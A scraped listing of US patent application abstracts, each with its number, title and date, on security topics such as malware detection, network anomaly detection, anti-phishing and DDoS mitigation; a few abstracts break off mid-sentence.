20080276314SOFTWARE PROTECTION INJECTION AT LOAD TIME - A method to apply a protection mechanism to a binary object includes using operating system resources to load a binary object from a storage medium along with a manifest and a digital signature. Authentication of the binary object is performed using the digital signature and the manifest is read to determine a category of protection for the binary object. The operating system selects a protection mechanism corresponding to the protection category and injects protection mechanism code, along with the binary object into a binary image on computer RAM. When the binary image is accessed, the protection mechanism executes and either allows full access and functionality to the binary object or prevents proper access and operation of the binary object. The protection mechanisms may be updated independently from the information on the storage medium.11-06-2008
20110209215Intelligent Network Security Resource Deployment System - An electronic communication network includes a connectivity subsystem and security scanning resources. The connectivity subsystem checks the present trust level of the source of received traffic to determine if security scanning resources are to be used and how to use the security scanning resources.08-25-2011
20080209552IDENTIFYING POTENTIALLY OFFENDING CONTENT USING ASSOCIATIONS - Methods for identifying potentially harmful, malicious, or unwanted content based upon associations with known offenders are provided. Executable content associated with a domain is identified. The executable content URL and the domain are compared to URLs/domains known to be associated with malicious content. If the URL and/or the domain has been identified as associated with offending code, the remaining domain contents and any available associated information are examined to identify any referencing domains, referenced domains, linking domains, affiliated entities, etc. Each identified domain, affiliate, etc. is subsequently examined in a similar manner to identify any domain, entity, etc. having an association with malicious content. Each identified domain, entity, etc. is assigned a suspicion level based upon proximity to the source of the offending code. If desired, relationships among the domains, entities, and the like may be relationally mapped to render associations easier to identify.08-28-2008
20080216175COMPUTATIONAL SYSTEM INCLUDING MECHANISMS FOR TRACKING TAINT - Mechanisms have been developed for securing computational systems against certain forms of attack. Taint status for data accessible by processes is selectively maintained and propagated in correspondence with information flows of instructions executed by a computing system, so that a security (or other appropriate) response can be provided if and when a control transfer (or other restricted use) is attempted based on tainted data. One response that may be triggered is a change in the privilege level (root and guest) that is used to process code executing in a virtual environment, so as to allow remediation to be performed. The triggering events may be specified in a control block.09-04-2008
20100005528METHODS FOR HOOKING APPLICATIONS TO MONITOR AND PREVENT EXECUTION OF SECURITY-SENSITIVE OPERATIONS - The present invention discloses methods and media for hooking applications to monitor and prevent execution of security-sensitive operations, the method including the steps of: reading at least one configuration parameter list from a configuration module; hooking, by a hooking engine, a hooking point in an application, wherein the hooking point is defined in the configuration module; calling, by the application, the hooking point during operation of the application; matching at least one hooking parameter in the hooking point to at least one configuration parameter in at least one configuration parameter list; and upon detecting a match between the hooking parameter and at least one configuration parameter, performing at least one configuration-defined action. Preferably, the method further includes the step of: updating a state of the hooking engine. Preferably, the hooking engine is operative to prevent malicious operations by obfuscated code.01-07-2010
20090007266Adaptive Defense System Against Network Attacks - A system and method according to the invention provide an efficient resource allocation when receiving connection requests from different servers for data transfer and the efficient resource allocation is achieved by identifying and assigning a quality factor to each originating server. When an originating server presents an abusive behavior, it may be assigned to a state that has a low quality factor, thus receiving little resource from the system.01-01-2009
20100146621METHOD OF EXTRACTING WINDOWS EXECUTABLE FILE USING HARDWARE BASED ON SESSION MATCHING AND PATTERN MATCHING AND APPRATUS USING THE SAME - A method and apparatus for extracting a windows executable file that can search for a pattern related to windows executable files among a large quantity of network packets using a hardware-based session tracking and pattern matching technology and that can extract all packets included in the corresponding session are provided. The method of extracting a windows executable file includes: collecting incoming packets having a payload according to a session of a reference packet having an MZ pattern; performing a portable executable (PE) pattern matching for the collected incoming packets; and forming a PE file based on at least one incoming packet satisfying the PE pattern matching.06-10-2010
20110209217INFORMATION PROCESSING APPARATUS, INFORMATION PROCESSING METHOD, AND PROGRAM - There is provided a PC including a guest OS group which manages a group including an OS executed in an office, an information-management section which manages communication capability information which is set to communication-capable information or communication-incapable information, a being-inside-office determination processing section which determines whether or not the PC is used in the office, which sets the communication capability information to the communication-capable information when the being-inside-office determination processing section determines that the PC is used in the office, and which sets the communication capability information to the communication-incapable information when the being-inside-office determination processing section determines that the PC is not used in the office, and a communication control section which controls communication with another device performed by an OS execution section which executes the OS included in the group based on the communication capability information.08-25-2011
20110209216METHOD AND SYSTEM FOR WEBSITE DATA ACCESS MONITORING - In a network comprising number of web sites and at least one simulator web page calls are simulated or monitored and the response to the calls, including content, re-directed calls and cookies are examined in order to identify whether the content of cookies has been written or modified illegally. Illegal modification of content of cookies is referred to as writing of data by a Buyer in cookies of a User that was directed to the Buyer by a Data Publisher, without the consent of the Data Publisher. In some embodiments when illegal cookies are identified an alert may be issued to a user.08-25-2011
20080250497STATISTICAL METHOD AND SYSTEM FOR NETWORK ANOMALY DETECTION - An anomaly detection method and system determine network status by monitoring network activity. A statistics based profile for said network over a period is generated to analyze potentially anomalous network activity to determine if said network activity is anomalous by comparing current activity against the profile. Using the profile as a reference, the anomaly detection system and process estimate and prioritize potentially anomalous network activity based on the probability that the behavior is anomalous. The level of severity that the anomaly detection process uses to determine if an alarm is needed is based on comparing user-adjustable thresholds to the current probability. If the threshold has been breached, the user is alerted, subject to other quality checks. After a reporting cycle concludes, the anomaly detection system and process recompiles the statistics based profile to take into account the information observed in the previous reporting cycle.10-09-2008
20120144483METHOD AND APPARATUS FOR PREVENTING NETWORK ATTACK - The present disclosure relates to the communication field, and discloses a method for preventing a network attack. The method includes: receiving a packet; when the received packet is a first packet, determining whether a source IP address and a source MAC address information that are carried in the first packet exist in a first record table; if so, obtaining a second packet, the source addresses of which are the same as the source as addresses of the first packet, and sending the second packet to a CPU for processing. Through this method, a network attack can be prevented effectively, and a packet can be sent to the CPU for processing in the case that the validity of the packet is determined. Therefore, some application that requires sending packets to the CPU for processing is supported. The present disclosure further discloses an apparatus for preventing a network attack.06-07-2012
20090265782MOBILE STATION AND METHOD FOR AVOIDING ATTACKS - A mobile station wirelessly communicates with an access point during an awake mode of the mobile station through a wireless network and avoids attacks from an attacking station. The mobile station includes a detecting module, an attack-proof module, and a data transmission module. The detecting mobile is configured for detecting a fake null frame from the wireless network during the awake mode. The fake null frame is for interrupting communication between the mobile station and the access point in order for the mobile station to enter a power saving mode. The attack-proof module is configured for transmitting an attack-proof frame to the access point so as to notify the access point that the mobile station has not entered into the power saving mode. The data transmission module is for transmitting data to the access point and receiving data from the access point. A method for avoiding attacks is also provided.10-22-2009
20090265781Location information verification - Location information is provided with an authenticator in order to enable future providing of an authentication to a service or application making use of the location information. The authenticator is based on a cryptographic method known by a provider and recipient of and also optionally based on position data provided by the location information. The authenticator is carried as a watermark in the location information so that the location information can be used by prior existing systems and enables the authentication of the location information in compatible authentication enabled systems. On receiving the location information, an authentication enabled recipient obtains the authenticator from the location information and checks using the authenticator whether use of the location information may be allowed.10-22-2009
20090265780ACCESS EVENT COLLECTION - On-line and computationally efficient methods and systems are provided for back resolving path names of files from inode numbers during data access request processing. As a result, a near real-time recording of data access events is achieved, including identification of the user who performed the access, and the full path name of the data object that was accessed. In a typical application, access events are collected for use in access control of storage elements in complex organizational file systems.10-22-2009
20090064331System and method for preventing detection of a selected process running on a computer - A system and method are disclosed for preventing detection of a monitoring process running on a computer. A request to access a process file concerning a process running on the computer is received from a user. It is determined whether the process file requested by the user relates to the selected process. If the requested process file does not relate to the selected process, the user is provided with access to the file.03-05-2009
20080282348Methods, Devices and Data Structures for Trusted Data - A data structure has within it the following elements: an identification of a data structure type; and a proof that two or more instances of the data structure type are as trustworthy as each other. Methods and devices using such data structures are described.11-13-2008
20080235796Circuit Arrangement with Non-Volatile Memory Module and Method for Registering Attacks on Said Non-Volatile Memory Switch - In order to further develop a circuit arrangement (09-25-2008
20080235793INTEGRITY PROTECTION IN DATA PROCESSING SYSTEMS - A method for protecting the integrity of a set of memory pages to be accessed by an operating system of a data processing system, includes running the operating system in a virtual machine (VM) of the data processing system; verifying the integrity of the set of memory pages on loading of pages in the set to a memory of the data processing system for access by the operating system; in response to verification of the integrity, designating the set of memory pages as trusted pages and, in a page table to be used by the operating system during the access, marking non-trusted pages as paged; and in response to a subsequent page fault interrupt for a non-trusted page, remapping the set of pages to a region of the data processing system memory which is inaccessible to the virtual machine.09-25-2008
20080289038METHOD AND APPARATUS FOR CHECKING INTEGRITY OF FIRMWARE - Provided are a method and apparatus for checking the integrity of firmware. The method includes storing a first hash function value of unhacked firmware for determining whether actual firmware of an external processor has been hacked; reading the actual firmware via a bus; calculating a second hash function value of the actual firmware; comparing the first hash function value with the second hash function value; and sharing a bus key with the external processor, based on the comparison result.11-20-2008
20090328208METHOD AND APPARATUS FOR PREVENTING PHISHING ATTACKS - The disclosure generally relates to a method for preventing phishing attacks on a computer browser. The method includes the steps of: providing a web browser having a bookmark group; directing the browser to a first Uniform Resource Locator (“URL”) having a first URL address, the first URL address having a plurality of alpha-numeric characters pointing to a first IP address; saving the first URL address in the bookmark group as a first bookmark; receiving an email communication containing a second URL address, the second URL address having a plurality of alpha-numeric characters similar to the first URL address and purporting to point to the first IP address; comparing the first URL address with the second URL address; and determining whether the first URL address and the second URL address share an identical IP addresses.12-31-2009
20090328209Simplified Communication of a Reputation Score for an Entity - A reputation server is coupled to multiple clients via a network. A security module in each client monitors client encounters with entities such as files, programs, and websites, and then computes a hygiene score based on the monitoring. The hygiene scores are then provided to the reputation server, which computes reputation scores for the entities based on the clients' hygiene scores and the interactions between the clients and the entity. When a particular client encounters an entity, the security module obtains a reputation score for the entity from the reputation server. The reputation score may comprises a statistical measure based on a number of other trustworthy or “good hygiene” clients that have a hygiene score above a threshold. The client communicates this reputation score to a user with a message indicating that the reputation score is based on other clients deemed trustworthy.12-31-2009
20090328205USER ESTABLISHED GROUP-BASED SECURITY FOR USER CREATED RESTFUL RESOURCES - A system for securing user created Web resources that includes a data store and a URI security engine. The data store can store digitally encoded content comprising a set of user created, URI identified resources. The URI security engine can provide declarative instance based URI access control to the user created URI identified resources. The URI security engine can apply semantics of user/group control for accessing the URI identified resource. These controls can be group controlled based upon deployer (creator) established privileges rather than being based upon an explicit developer established privileges, which may not be possible since the resources can be deployer (end-user) created resources not existing at development time.12-31-2009
20090328210CHAIN OF EVENTS TRACKING WITH DATA TAINTING FOR AUTOMATED SECURITY FEEDBACK - An automated security feedback arrangement is provided by which a specialized audit record called a tainting record is linked to data crossing the perimeter of a corpnet that comes from potentially untrusted sources. The linked tainting record operates to taint such data which may be received from external sources such as e-mail and websites or which may comprise data that is imported into the corpnet from mobile computing devices. Data that is derived from the original data is also tainted using a linked tainting record which includes a pointer back to the previous tainting record. The linking and pointing back are repeated for all subsequent derivations of data to thus create an audit trail that may be used to reconstruct the chain of events between the original data crossing the perimeter and any security compromise that may later be detected in the corpnet.12-31-2009
20090328207VERIFICATION OF SOFTWARE APPLICATION AUTHENTICITY - Various techniques are provided for verifying the authenticity of software applications. Such techniques are particularly useful for verifying the authenticity of software applications used in online transactions involving users, payment service providers, and/or merchants. In one example, a set of application identifiers associated with a plurality of authenticated software applications are maintained and a verification request is received comprising an application identifier associated with an unverified software application. A token is generated in response to the verification request if the application identifier is in the set of application identifiers. The generated token is passed to the unverified software application. A user token is received and processed to determine whether the unverified software application is one of the authenticated software applications. A verification request is sent based on the processing. Additional methods and systems are also provided.12-31-2009
20090328206Method for Adminstration of Computer Security Threat Countermeasures to a Computer System - A countermeasure for a computer security threat to a computer system is administered by establishing a baseline identification of an operating or application system type and an operating or application system release level for the computer system that is compatible with a Threat Management Vector (TMV). A TMV is then received, including therein a first field that provides identification of at least one operating system type that is affected by a computer security threat, a second field that provides identification of an operating system release level for the operating system type, and a third field that provides identification of a set of possible countermeasures for an operating system type and an operating system release level. Countermeasures that are identified in the TMV are processed if the TMV identifies the operating system type and operating system release level for the computer system as being affected by the computer security threat. The received TMV may be mutated to a format for processing of the countermeasure.12-31-2009
20090328204INFORMATION SECURITY APPARATUS, SECURITY SYSTEM, AND METHOD FOR PREVENTING LEAKAGE OF INPUT INFORMATION - Provided are an information security apparatus and a security system which prevent eavesdropping on input information input by an input device and identify eavesdroppers. In information security apparatus 12-31-2009
20080250496Frame Relay Device - A frame relay device includes a table where an entry containing a combination of an MAC address and an IP address is registered to be used in the frame relay processing of a local device. Moreover, the frame relay device includes judgment means for searching the table by the transmission origin MAC address and the transmission origin IP address contained in the frame received and judging whether the combination of the transmission origin addresses is registered as a relay object in the layer 10-09-2008
20080276313Applianced Domain Name Server - A software installation package for a domain name server (DNS) comprises a hardened operating system, a domain name server software, a management interface. To detect and block attack attempts (11-06-2008
20080271143Insider threat detection - Methods, systems, and computer program products for insider threat detection are provided. Embodiments detect insiders who act on documents and/or files to which they have access but whose activity is inappropriate or uncharacteristic of them based on their identity, past activity, and/or organizational context. Embodiments work by monitoring the network to detect network activity associated with a set of network protocols; processing the detected activity to generate information-use events; generating contextual information associated with users of the network; and processing the information-use events based on the generated contextual information to generate alerts and threat scores for users of the network. Embodiments provide several information-misuse detectors that are used to examine generated information-use events in view of collected contextual information to detect volumetric anomalies, suspicious and/or evasive behavior. Embodiments provide a user threat ranking system and a user interface to examine user threat scores and analyze user activity.10-30-2008
20100005530SYSTEM AND METHOD FOR SCANNING MEMORY FOR PESTWARE OFFSET SIGNATURES - Systems and methods for managing pestware processes on a protected computer are described. In one implementation, a reference point in the executable memory that is associated with a process running in the executable memory is located. A first and second sets of information from corresponding first and second portions of the executable memory are then retrieved. The first and second portions of the executable memory are separated by a defined offset, and each of the first and second portions of the executable memory are offset from the reference point. The process is identifiable as a particular type of pestware when the first and second sets of information each include information previously found to be separated by the defined offset in other processes that are of the particular type of pestware. In some variations, the reference point is a starting address and/or an API implementation in the process.01-07-2010
20080209551File Conversion in Restricted Process - Embodiments are described for removing malicious code from a file in a first file format by converting the file into a converted file of a second file format. In embodiments, converting the file eliminates malicious code embedded within the file from being stored in the converted file. The conversion is performed within a restricted computer process that has restricted privileges limiting its access to an operating system and an underlying computer system. As a result, even if malicious code embedded within the file executes while the file is being converted into the converted file, the damage to a computer system is mitigated because of the limited privileges provided to the restricted process.08-28-2008
20100138917REFRESH MECHANISM FOR RATE-BASED STATISTICS - Rate-based statistics are aperiodically refreshed. For example, for each Internet Protocol address being monitored, a time stamp of the last (most recent) statistics object (e.g., packet) and corresponding rate-based statistics are stored. The time stamp of a new statistics object is compared with the stored time stamp. The stored time stamp may be updated, and the stored statistics may be updated or refreshed, depending on the result of the comparison.06-03-2010
20100138919SYSTEM AND PROCESS FOR DETECTING ANOMALOUS NETWORK TRAFFIC - A process for detecting anomalous network traffic in a communications network, the process including: generating reference address distribution data representing a statistical distribution of source addresses of packets received over a first time period, the received packets being considered to represent normal network traffic; generating second address distribution data representing a statistical distribution of source addresses of packets received over a second time period; and determining whether the packets received over the second time period represent normal network traffic on the basis of a comparison of the second address distribution data and the reference address distribution data.06-03-2010
20100138918Keyboard Security Status Check Module and Method - A keyboard security status check module and method are provided. The module is provided to enable a user to easily check the operating status of a keyboard security program installed in a user terminal. The module includes a keyboard security monitor linked to the keyboard security program and configured to monitor a reception status of key input data protected by keyboard security, and a controller configured to display a dynamic keyboard security check representation on a screen of the user terminal according to the reception status of the key input data monitored by the keyboard security monitor.06-03-2010
20080271141PARALLELIZED PATTERN MATCHING USING NON-DETERMINISTIC FINITE AUTOMATA - This disclosure describes techniques of determining whether a symbol stream includes a pattern defined by a regular expression. As described herein, the regular expression may be represented using a non-deterministic finite automaton (NFA). A plurality of states in the NFA may be evaluated in parallel. These states may be associated with a plurality of symbol positions in a symbol stream. Evaluating a plurality of states and symbols in parallel may allow for faster determinations of whether the symbol stream includes the pattern defined by the regular expression.10-30-2008
20080271142PROTECTION AGAINST BUFFER OVERFLOW ATTACKS - A system including storage comprising software code and a plurality of data structures. The system also includes processing logic coupled to the storage and adapted to execute the software code. If the processing logic executes a function call instruction, the processing logic stores copies of software code return information to a first data structure location and to a second data structure location. If, after executing a function associated with the function call instruction, the processing logic determines that data from the first and second data structure locations do not match, the processing logic initiates a security measure. The data is associated with the copies.10-30-2008
20090049545TOLERATING AND DETECTING ASYMMETRIC RACES - Detecting and/or tolerating races. Races occur due to malicious threads not respecting software locks. A method of detecting and/or correcting races includes making local copie(s) and reference copie(s) of shared data. Any read and write operations performed by a safe thread are caused to be performed on the local copie(s) during a critical section. The critical section defines a time frame which a variable lock is placed on shared data. Any read and write operations performed by malicious threads are allowed to be performed on the shared data during the critical section. The shared data, the local copie(s), and the reference copie(s) are compared to determine that a race has been detected. An indication can be output that a race has occurred or the race can be corrected.02-19-2009
20130219496SECURITY CONFIGURATION VERFICIATION DEVICE AND METHOD AND NETWORK SYSTEM EMPLOYING THE SAME - The invention discloses a security configuration verification device for performing a security configuration verification on a network device, which comprises: one or more preconfigured scanning policies; a scanning policy generator, which selects a scanning policy from the one or more preconfigured scanning policies to generate a new scanning policy corresponding to the network device; and a scanner, which performs the security scanning on the network device with the generated new scanning policy and thereby performs the security configuration verification. The invention also discloses a corresponding security configuration verification method and a network system employing the verification device.08-22-2013
20090126014METHODS AND SYSTEMS FOR ANALYZING SECURITY EVENTS - In one aspect, the technology relates to a method for analyzing a security event in a distributed fashion. The method includes the steps of detecting an occurrence of a security event within a customer network and querying a first component of the customer network for data in response to the detected occurrence of the security event. The method also includes the steps of receiving, by a data monitor located within the customer network, first data from the component in response to the query and determining, based on the received first data, whether to query for additional data. The method additionally includes querying at least one of the first component and another component of the customer network to obtain the additional data in response to the determining step, and analyzing the security event using at least one of the first data and the additional data.05-14-2009
20090126012Risk Scoring System For The Prevention of Malware - A method suitable for detecting malicious files includes several steps. A file that is received into a computer system is analyzed to determine a presence or absence of each of a plurality of predefined properties in the file. A score is calculated based on the presence or absence of the plurality of properties in the file. This score is reflective of the risk that the file is malicious. Once the score is calculated, the file can be further processed based on the score.05-14-2009
20090178137SYSTEMS AND METHODS FOR SECURELY PROCESSING SENSITIVE STREAMS IN A MIXED INFRASTRUCTURE - A system and method for securely processing sensitive streams in a mixed infrastructure includes analyzing a stream to determine data sensitivity. A likelihood that processing elements employed to process the stream would result in a risk to sensitive information is determined. At least a portion of the data stream having sensitive information is transferred to a secure processing environment to ensure security of the data stream during processing.07-09-2009
20090165131DETECTION AND PREVENTION OF MALICIOUS CODE EXECUTION USING RISK SCORING - A system and method for preventing malicious code execution, includes detecting a request for execution of a file. The file is scanned for risk before processing the request. A score is assigned to the risk. Execution of the file is either allowed or prohibited responsive to the risk score.06-25-2009
20090144820System, Method and Apparatus for Protecting a Network or Device Against High Volume Attacks - The present invention provides a system, method and apparatus for protecting against high volume attacks. The present invention receives a packet, determines a source of the received packet, and updates a tree-based data structure based on the source of the received packet. The received packet is accepted or passed on whenever one or more statistics stored within the tree-based data structure do not exceed a threshold. The received packet is dropped whenever the one or more statistics exceed the threshold. The present invention can be implemented in hardware, software or a combination thereof. The software will implement the steps as one or more code segments of a computer program embodied on a computer readable medium.06-04-2009
20090138968DISTRIBUTED NETWORK PROTECTION - A method for processing frames transmitted in a network including nodes and network segments connecting the nodes. Frames transmitted over network segments are detected. Frame information from each detected frame is stored in a frame information repository. A stored hierarchical data structure includes vectors specifying frame information defining frames permitted in the network, classes including vectors with constraints on the vectors, and patterns including classes with constraints on the classes. The frame information in the detected frames may not match the frame information specified in the vectors. The vectors, if matched by the frame information in the detected frames, may not satisfy the constraints in the classes. The vectors, if matched by the frame information in the detected frames, may satisfy the constraints in the classes, and the classes whose constraints are satisfied by the matched vectors may not satisfy the constraints in the patterns.05-28-2009
20090178139Systems and Methods of Network Security and Threat Management - The present disclosure generally provides systems and methods of network security and threat management. An exemplary system includes detection and prevention modules (DPM) designed specifically to collect and transmit suspicious binary network packet data. The collected network packets are sent to a behavioral correlation module to perform automatic behavioral correlation: (1) within each DPM, (2) across all DPMs installed on a network, and (3) across all DPMs installed on all networks. The results of the behavioral correlation are sent to a security dashboard module (SDM), which generally acts as a fully integrated Security Event Management system and collects, correlates, and prioritizes global network alerts, local network alerts, posted vendor alerts, and detected network vulnerabilities with enterprise assets. The SDM could display the results in a user-friendly graphical user interface and has the ability to perform geographic mapping of externally generated threats.07-09-2009
20110225651Trojan-Resistant Bus Architecture and Methods - A method of securing bus architecture from a Trojan attack. A restricted address access detector generates an unauthorized access detection, signal when a master ID signal is within a restricted range. The unauthorized access detection signal disables the requested slave select signal, and the address decoder instead outputs a default slave select signal. A counter determines the duration of a lock signal from a master, and a comparator activates a malicious bus lock signal if the lock signal duration exceeds a threshold. The master mask register forcibly gates the lock signal upon receipt of the malicious bus lock signal. If the duration of a wait request from a slave exceeds a maximum duration register value, a comparator activates a malicious wait detection signal to disable the wait request signal. The method might include storing identifying information about the malicious master and storing a slave ID corresponding to the malicious slave.09-15-2011
20090064327Low cost high efficiency anti-phishing method and system called 'safety gates' - A low-cost, secure, reliable, convenient, and efficient way to reduce the efficiency of phishing attacks method and system, which consists in putting before login page one or several complimentary login pages, called ‘safety gates’, which lead to web pages with content known only to a legitimate user, who created the online account and pre-loaded digital content displayed after login into the ‘safety gate’.03-05-2009
20090064328SYSTEM, APPARATUS AND METHOD OF MALWARE DIAGNOSIS MECHANISM BASED ON IMMUNIZATION DATABASE - An immunization system including: an immunization client apparatus which determines whether a target code is a malicious code by performing an immunization operation with respect to a first immunization signature and a code signature that is extracted from the target code and reports the result of the determination to an immunization server; and the immunization server which diagnoses whether the target code is the malicious code, updates a second immunization signature based on the reported result of the determination, and transmits to the immunization client apparatus an update message about the updated second immunization signature, wherein the immunization client apparatus updates the first immunization signature based on the received update message is provided.03-05-2009
20090064323USE OF GLOBAL INTELLIGENCE TO MAKE LOCAL INFORMATION CLASSIFICATION DECISIONS - Methods and systems are provided for delaying local information classification until global intelligence has an opportunity to be gathered. According to one embodiment, an initial information identification process, e.g., an initial spam detection, is performed on received electronic information, e.g., an e-mail message. Based on the initial information identification process, classification of the received electronic information is attempted. If the received electronic information cannot be unambiguously classified as being within one of a set of predetermined categories (e.g., spam or clean), then an opportunity is provided for global intelligence to be gathered regarding the received electronic information by queuing the received electronic information for re-evaluation. The electronic information is subsequently classified by performing a re-evaluation information identification process, e.g., re-evaluation spam detection, which provides a more accurate categorization result than the initial information identification process. Handling the electronic information in accordance with a policy associated with the categorization result.03-05-2009
20090187988CROSS-NETWORK REPUTATION FOR ONLINE SERVICES - A reputation server associates feedback from previous network transactions with an account of a user in a network. A reputation score for the user is calculated based on the feedback to indicate the probability the user will abuse the network. When an online service receives a request to perform a transaction from the user, the online service performs the transaction based on the user's reputation score. Additionally, a server generates a reputation packet including the reputation score for a user for use by an online service when the user requests the online service to perform a transaction. The online service may authenticate the reputation packet with the server and, if the reputation packet is authenticated, the online service performs the transaction based on the user's reputation score.07-23-2009
20090187987Learning framework for online applications - Learning to, and detecting spam messages using a multi-stage combination of probability calculations based on individual and aggregate training sets of previously identified messages. During a preliminary phase, classifiers are trained, lower and upper limit probabilities, and a combined probability threshold are iteratively determined using a multi-stage combination of probability calculations based on minor and major subsets of messages previously categorized as valid or spam. During a live phase, a first stage classifier uses only a particular subset, and a second stage classifier uses a master set of previously categorized messages. If a newly received message can not be categorized with certainty by the first stage classifier, and a computed first stage probability is within the previously determined lower and upper limits, first and second stage probabilities are combined. If the combined probability is greater than the previously determined combined probability threshold, the received message is marked as spam.07-23-2009
20090144822WITHHOLDING LAST PACKET OF UNDESIRABLE FILE TRANSFER - A system and method for disrupting the download of undesirable files. A data store traps the final block or blocks of a file transfer which is held for detection of viruses, trojan horses, spyware, worms, dishonest ads, scripts, plugins, and other files considered computer contaminants. Innocuous file transfers are completed with minimum disruption as perceived by the user.06-04-2009
20110225649Protecting Computer Systems From Malicious Software - A method, computer program product, and apparatus for determining whether newly installed software is malicious software are presented. In one illustrative embodiment, software is installed on a computer system to produce newly installed software running in a secured part of the computer system. The newly installed software is only permitted to access a subset of resources in the computer system when running in the secured part. The newly installed software is run on the computer system until a selected event occurs. The newly installed software running on the computer system is monitored until the selected event occurs. The monitoring creates information used to evaluate the software for malicious behavior. The information is presented on a display to a user after the selected event has occurred, wherein the presented information comprises a recommendation of whether to provide the software access to the resources in the computer system outside the subset of resources.09-15-2011
20090083853METHOD AND SYSTEM PROVIDING EXTENDED AND END-TO-END DATA INTEGRITY THROUGH DATABASE AND OTHER SYSTEM LAYERS - Providing extended or end-to-end data integrity through layers of a system. In one aspect, information is to be transmitted between an application end of the system and a physical storage medium that stores the information for a database of the system, the information to be transmitted via a database server in a database server layer of the system. At least a portion of data protection is provided for the information, the data protection causing the information to be protected from corruption between a system layer and the physical storage medium, where the system layer is a separate layer provided closer to the application end of the system than the database server layer.03-26-2009
20100269175METHODS, SYSTEMS, AND MEDIA FOR MASQUERADE ATTACK DETECTION BY MONITORING COMPUTER USER BEHAVIOR - Methods, systems, and media for masquerade attack detection by monitoring computer user behavior are provided. In accordance with some embodiments, a method for detecting masquerade attacks is provided, the method comprising: monitoring a first plurality of user actions and access of decoy information in a computing environment; generating a user intent model for a category that includes at least one of the first plurality of user actions; monitoring a second plurality of user actions; comparing the second plurality of user actions with the user intent model by determining deviation from the generated user intent model; identifying whether the second plurality of user actions is a masquerade attack based at least in part on the comparison; and generating an alert in response to identifying that the second plurality of user actions is the masquerade attack and in response to determining that the second plurality of user actions includes accessing the decoy information in the computing environment.10-21-2010
20090064329Zero-hour quarantine of suspect electronic messages - The zero-hour quarantine comprises a tool for flagging potentially harmful messages/files prior to having an anti-virus signature published for a particular virus. The suspect file is sent to the zero-hour quarantine and periodically scanned, giving time for creation of a signature file that would then detect the virus. An example method may include receiving and examining a message for attributes indicative of its undesirability, and assigning a threat score to the message. The method may comprise disposing of the message by comparing the threat score to first and second thresholds, and the message sent to a permanent quarantine if the threat score passes the first threshold. The message is sent to the zero-hour quarantine if the assigned threat score does not pass the second threshold but passes the second threshold, or is delivered to the recipient if the assigned threat score does not pass the first or second threshold.03-05-2009
20120079592IP PRIORITIZATION AND SCORING SYSTEM FOR DDOS DETECTION AND MITIGATION - A method and system to mitigate an attack over the Internet includes collecting information related to a plurality of client IP addresses from a plurality of sources and analyzing the collected information to determine confidence scores for the plurality of client IP addresses. The method and system also include receiving network traffic from the Internet and limiting network traffic from a first subset of the plurality of client IP addresses characterized by a confidence score less than a first threshold. The method, and system further include determining a level of the network traffic and limiting network traffic from a second subset of the plurality of client IP addresses characterized by a confidence score less than a second threshold greater than the first threshold.03-29-2012
20120079591Data Filtering for Communication Devices - Technologies are generally described for data filtering for communication devices. In one example, a method of receiving data from a data source on a communication device is disclosed. The method includes determining, at the communication device, a domain name of the data source. The method also includes determining, at the communication device, one or more communication networks the communication device is connected to. The method further includes processing, at the communication device, the domain name for acceptance based on the one or more connected communication networks. The method also includes receiving the data from the data source, at the communication device, if the domain name is accepted.03-29-2012
20090241187METHOD AND SYSTEM FOR PROTECTION AGAINST INFORMATION STEALING SOFTWARE - A system and method for identifying infection of unwanted software on an electronic device is disclosed. A software agent configured to generate a bait and is installed on the electronic device. The bait can simulate a situation in which the user performs a login session and submits personal information or it may just contain artificial sensitive information. Parameters may be inserted into the bait such as the identity of the electronic device that the bait is installed upon. The output of the electronic device is monitored and analyzed for attempts of transmitting the bait. The output is analyzed by correlating the output with the bait and can be done by comparing information about the bait with the traffic over a computer network in order to decide about the existence and the location of unwanted software. Furthermore, it is possible to store information about the bait in a database and then compare information about a user with the information in the database in order to determine if the electronic device that transmitted the bait contains unwanted software.09-24-2009
20090083852Whitelist and Blacklist Identification Data - Aspects of the subject matter described herein relate to identifying good files and malware based on whitelists and blacklists. In aspects, a node starts a scan of files on a data store. In conjunction with starting the scan, the node creates a data structure that indicates the directories on the data store. The node sends the data structure to a whitelist server and a blacklist server and an indication of a last successful time of communication. The whitelist and blacklist servers respond to the node with information about any new files that have been added to the directories since the last successful communication. The node may subsequently use the information to identify known good files and malware.03-26-2009
20080263663ANOMALY DETECTION BASED ON DIRECTIONAL DATA - Properly detects an anomaly on the basis of directional data that are obtained in sequence from a monitored object. An anomaly detecting method includes: sequentially generating directional data indicating a feature of each piece of monitored data correspondingly to the monitored data which are input in sequence; calculating the dissimilarity of the directional data to a reference vector; updating a moment of the distribution of the dissimilarity appearing when the directional data is modeled with a multi-dimensional probability distribution, based on the moment already corresponding to the monitored data; calculating a parameter determining the variance of the multi-dimensional probability distribution, on the basis of the moment; calculating a threshold of the dissimilarity on the basis of the multi-dimensional probability distribution the variance of which is determined by the parameter; and detecting an anomaly in the monitored data that corresponds to the dissimilarity if the dissimilarity exceeds the threshold.10-23-2008
20080263661DETECTING ANOMALIES IN SIGNALING FLOWS - The present invention relates to a method of detecting anomalies in signaling flows in a communication device connected to a database. In accordance with the method, a communication device receives (10-23-2008
20080263659SYSTEM AND METHOD FOR DETECTING MALICIOUS MOBILE PROGRAM CODE - A system and method of detecting malware. A program file is received and analysis performed to identify URLs embedded in the program file. The URLs are categorized as a function of a URL filter database and a malware probability is assigned to each URL identified. A decision is made on how to dispose of the program file as a function of the malware probability of one or more of the URLs identified. In one example approach, a malware type is also assigned to the program file as a function of one or more of the URLs identified.10-23-2008
20080263660Method, Device and Program for Detection of Address Spoofing in a Wireless Network - The invention relates to a method, device and program for detection of address spoofing in a wireless network. According to the invention, a sensor is installed in order to capture frames transmitted over the wireless network which have an address field comprising an address of a network access point. The captured frames are analyzed in order to establish a list of stations that are associated with the access point. Another list of stations associated with the access point is obtained from the latter. The two station lists are compared in order to detect possible access point address spoofing.10-23-2008
20080263662SYSTEM AND METHOD FOR FUZZY MULTI-LEVEL SECURITY - An access control system and method includes a risk index module which computes a risk index for a dimension contributing to risk. A boundary range defined for a parameter representing each risk index such that the parameter above the range is unacceptable, below the range is acceptable and in the range is acceptable with mitigation measures. A mitigation module determines the mitigation measures which reduce the parameter within the range.10-23-2008
